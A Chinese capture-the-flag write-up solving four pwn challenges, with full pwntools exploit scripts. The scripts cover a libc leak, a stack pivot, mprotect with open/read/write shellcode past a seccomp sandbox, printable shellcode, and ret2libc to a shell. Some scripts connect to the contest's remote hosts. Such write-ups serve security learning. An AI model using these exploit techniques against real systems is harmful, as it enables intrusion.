EzSignIn
签到题,直接nc得到flag
Elden Ring Ⅰ
下载题目附件发现给了一个libc库,一张图片,还有一个文件
其实这个图片没什么用,一开始看到有图片还以为这题要结合misc
看到libc库基本就确定这题要用到libc了
将文件保存到虚拟机里checksec查看保护
开启NX,64位,动态编译,IDA分析:
看到seccomp函数,得知本题存在沙盒保护
进入vuln函数查看:
简简单单一个读入函数,可以栈溢出,但溢出字节不多
既然有沙盒,那肯定考虑使用orw的做法,这边我就不再复述思路了,不知道orw思路的朋友可以去看看我的另一篇专门写沙盒的博文:https://blog.csdn.net/2301_79880752/article/details/136016919?spm=1001.2014.3001.5502
实操:
首先我们需要泄露基址,由于本题可以栈溢出,因此我们可以直接泄露基址:
随后栈迁移修改地址到bss段
调用mprotect函数,并使用orw获取flag
这边有一点需要注意:
前面提到过,可以栈溢出,但溢出的字节不多,因此脚本编写到这里需要再一次栈迁移
不了解的朋友可以去看看另一个跟我一起学习的朋友的博文,它对基础栈迁移写得较详细:
https://blog.csdn.net/2302_79813730/article/details/136005454?spm=1001.2014.3001.5502
脚本如下:
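from pwn import *

# Elden Ring I (write-up above): stage 1 leaks the libc base through
# puts(puts@got); stage 2 pivots the stack into .bss; stage 3 calls
# mprotect() on the .bss page and runs open/read/write shellcode, since
# the binary installs a seccomp filter and the write-up uses the orw route.
context(log_level='debug', os='linux', arch='amd64')

p = remote("47.102.130.35", 31975)
libc = ELF("./libc.so.6")
elf = ELF("./vuln")
# Local alternative used while developing the script:
# p = process("./vuln")
# libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")


def bug():
    """Attach gdb to the target and pause; only meaningful with process()."""
    gdb.attach(p)
    pause()


BANNER = b"Greetings. Traveller from beyond the fog. I Am Melina. I offer you an accord.\n"
rdi = 0x00000000004013e3      # gadget the write-up uses to load rdi
ret_after_leak = 0x40125B     # address returned to once puts() has printed the leak

# ---- stage 1: leak libc base -------------------------------------------------
p.recvuntil(BANNER)
pay = (b'a' * 0x108
       + p64(rdi) + p64(elf.got['puts'])
       + p64(elf.plt['puts'])
       + p64(ret_after_leak))
p.send(pay)
# puts() prints the pointer without its two high zero bytes; pad back to 8.
puts_addr = u64(p.recvuntil(b"\x7f")[-6:].ljust(8, b'\x00'))
print(hex(puts_addr))
libc_base = puts_addr - libc.sym['puts']
print(hex(libc_base))

# ---- stage 2: pivot into .bss --------------------------------------------------
bss = 0x404060 + 0x500
p.recvuntil(BANNER)
pay = b'a' * 0x100 + p64(bss + 0x100) + p64(0x401276)
p.send(pay)

# ---- stage 3: mprotect(0x404000, 0x1000, 7) then orw shellcode ----------------
rsi = libc_base + 0x000000000002601f          # alt offset noted in write-up: 0x2be51
rdx_r12 = libc_base + 0x0000000000119211      # alt offset noted in write-up: 0x11f497
mprotect = libc_base + libc.sym['mprotect']

rop = (p64(rdi) + p64(0x404000)
       + p64(rsi) + p64(0x1000)
       + p64(rdx_r12) + p64(7) * 2            # second 7 is the r12 filler (per gadget name)
       + p64(mprotect)
       + p64(0x4045a8))                       # lands on the shellcode that follows
shellcode = (asm(shellcraft.open("/flag"))
             + asm(shellcraft.read(3, bss + 0x700, 0x100))
             + asm(shellcraft.write(1, bss + 0x700, 0x100)))
pay = (rop + shellcode).ljust(0x100, b'\x00') + p64(bss - 8) + p64(0x0000000000401290)
# bug()
p.send(pay)
p.interactive()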
ezshellcode
保护全开,64位,动态编译,IDA分析:
这个题就是一个可显字符的shellcode
先输入-1
然后发送:b"Ph0666TY1131Xh333311k13XjiV11Hc1ZXYf1TqIHf9kDqW02DqX0D1Hu3M2G0Z2o4H0u0P160Z0g7O0Z0C100y5O3G020B2n060N4q0n2t0B0001010H3S2y0Y0O0n0z01340d2F4y8P115l1n0J0h0a070t"
就可以绕过了
这边注意不能用sendline发送
脚本如下:
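from pwn import *

# ezshellcode (write-up above): the binary expects printable shellcode.
# Answering -1 to the length prompt gets past the length check, then the
# alphanumeric payload is delivered with send(); the write-up stresses
# that sendline() must not be used for it.
context(os='linux', arch='amd64', log_level='debug')

p = process('./shellcode')
# p = remote('47.102.130.35', 31408)

# Printable x86-64 shellcode taken verbatim from the write-up.
shellcode = b'Ph0666TY1131Xh333311k13XjiV11Hc1ZXYf1TqIHf9kDqW02DqX0D1Hu3M2G0Z2o4H0u0P160Z0g7O0Z0C100y5O3G020B2n060N4q0n2t0B0001010H3S2y0Y0O0n0z01340d2F4y8P115l1n0J0h0a070t'

p.recvuntil(b'input the length of your shellcode:')
p.sendline(b'-1')            # bytes rather than str(-1): avoids pwntools' str/bytes coercion
p.recvuntil(b'input your shellcode:')
p.send(shellcode)            # send(), not sendline(): no trailing newline
p.interactive()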
Elden Random Challenge
开启NX,64位,动态编译,IDA分析:
读入十二个字节到buf里,和v6是贴着的,而buf读入十二个字节是可以覆盖seed的,而seed是程序生成随机值的依据,覆盖掉seed以后它的随机值就可控了,写个c语言脚本控制生成的随机值
再跟进myread函数
存在栈溢出,由于本题附件给了libc库,因此直接通过libc获取权限得到flag
脚本如下:
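from pwn import *
import ctypes

# Elden Random Challenge (write-up above): the name read overruns buf into
# the RNG seed, so the guesses below are the precomputed sequence for a
# zeroed seed; after the guessing loop, myread() overflows the stack and a
# puts-leak followed by system("/bin/sh") gives a shell.
context(os='linux', arch='amd64', log_level='debug')

p = remote('47.100.245.185', 30511)
# p = process("./vuln")
libc = ELF("./libc.so.6")
elf = ELF("./vuln")


def bug():
    """Attach gdb to the target and pause; only meaningful with process()."""
    gdb.attach(p)
    pause()


rdi = 0x0000000000401423      # gadget the write-up uses to load rdi
read = 0x40125D               # address returned to once puts() has printed the leak

# Expected "random" values once the seed is zeroed; the write-up computes
# them with a small C helper.
answers = [84, 87, 78, 16, 94, 36, 87, 93, 50, 22, 63, 28, 91, 60, 64, 27, 41, 27, 73, 37,
           12, 69, 68, 30, 83, 31, 63, 24, 68, 36, 30, 3, 23, 59, 70, 68, 94, 57, 12, 43,
           30, 74, 22, 20, 85, 38, 99, 25, 16, 71, 14, 27, 92, 81, 57, 74, 63, 71, 97, 82,
           6, 26, 85, 28, 37, 6, 47, 30, 14, 58, 25, 96, 83, 46, 15, 68, 35, 65, 44, 51,
           88, 9, 77, 79, 89, 85, 4, 52, 55, 100, 33, 61, 77, 69, 40, 13, 27, 87, 95]

p.recvuntil(b"Menlina: Well tarnished, tell me thy name.")
p.send(b'\x00' * 0x12)        # 0x12 null bytes: fills buf and overwrites the adjacent seed
# bug()

for guess in answers:
    p.recvuntil(b"Please guess the number:\n")
    p.send(p32(guess))

p.recvuntil(b"Here's a reward to thy brilliant mind.")

# Stage 1: leak puts@got through puts@plt, then return to `read` for a second overflow.
payload1 = (b'a' * (0x30 + 8)
            + p64(rdi) + p64(elf.got['puts'])
            + p64(elf.plt['puts'])
            + p64(read))
p.sendline(payload1)
# puts() prints the pointer without its two high zero bytes; pad back to 8.
libc_base = u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00')) - libc.sym['puts']
print(hex(libc_base))

# Stage 2: system("/bin/sh").  rdi+1 is presumably the lone `ret` after the
# pop, used for stack alignment -- verify against the gadget.
system = libc_base + libc.sym['system']
bin_sh = libc_base + next(libc.search(b"/bin/sh\x00"))
payload2 = b'a' * (0x30 + 8) + p64(rdi) + p64(bin_sh) + p64(rdi + 1) + p64(system)
p.sendline(payload2)
p.interactive()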